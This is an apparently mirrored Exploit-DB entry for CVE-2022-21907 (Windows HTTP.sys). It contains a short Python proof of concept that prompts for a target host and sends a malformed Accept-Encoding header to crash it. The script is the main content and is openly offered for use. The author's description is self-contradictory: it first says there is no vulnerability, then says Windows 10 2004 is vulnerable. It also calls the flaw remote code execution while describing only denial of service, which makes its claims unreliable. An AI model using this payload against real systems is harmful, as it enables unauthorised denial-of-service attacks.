[remote] Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
2023-7-7 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:9 收藏

## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
## Author: nu11secur1ty
## Date: 01.14.2022
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
## CVE-2022-21907


## Description:
NOTE: After a couple of hours of tests and experiments, I found that
there have been no vulnerabilities, this is just a ridiculous
experiment of Microsoft. When I decided to install the IIS packages on
these Windows platforms, everything was ok, and everything is patched!
Windows Server 2019, Windows 10 version 1809 - 2018 year are not
vulnerable by default, but after I decided to upgrade from 1909 to
2004. I found a serious problem! The Windows 10 version 2004 - 2020
year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
method: buffer overflow - deny of service and restart the system. This
problem exists, from last year which is reported on CVE-2021-31166,
and still there! On that days I have worked on it again with the help
and collaboration of Axel Souchet 0vercl0k the author of the idea. On
that day, I wrote an only one-line command to exploit this
vulnerability!

[+]Exploit:
```python
#!/usr/bin/python
# Author @nu11secur1ty
# CVE-2022-21907

from colorama import init, Fore, Back, Style
init(convert=True)
import requests
import time

print(Fore.RED +"Please input your host...\n")
print(Style.RESET_ALL)

print(Fore.YELLOW)
host = input()
print(Style.RESET_ALL)

print(Fore.BLUE +"Sending of especially malicious crafted packages,
please wait...")
print(Style.RESET_ALL)
time.sleep(17)

print(Fore.GREEN)
# The PoC :)
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
'AAAAAAAAAAAAAAAAAAAAAAAA,\
	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
	 ****************************stupiD, *, ,',})
# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)

## Time spend:
05:30:00
            

文章来源: https://www.exploit-db.com/exploits/51575
如有侵权请联系:admin#unsafe.sh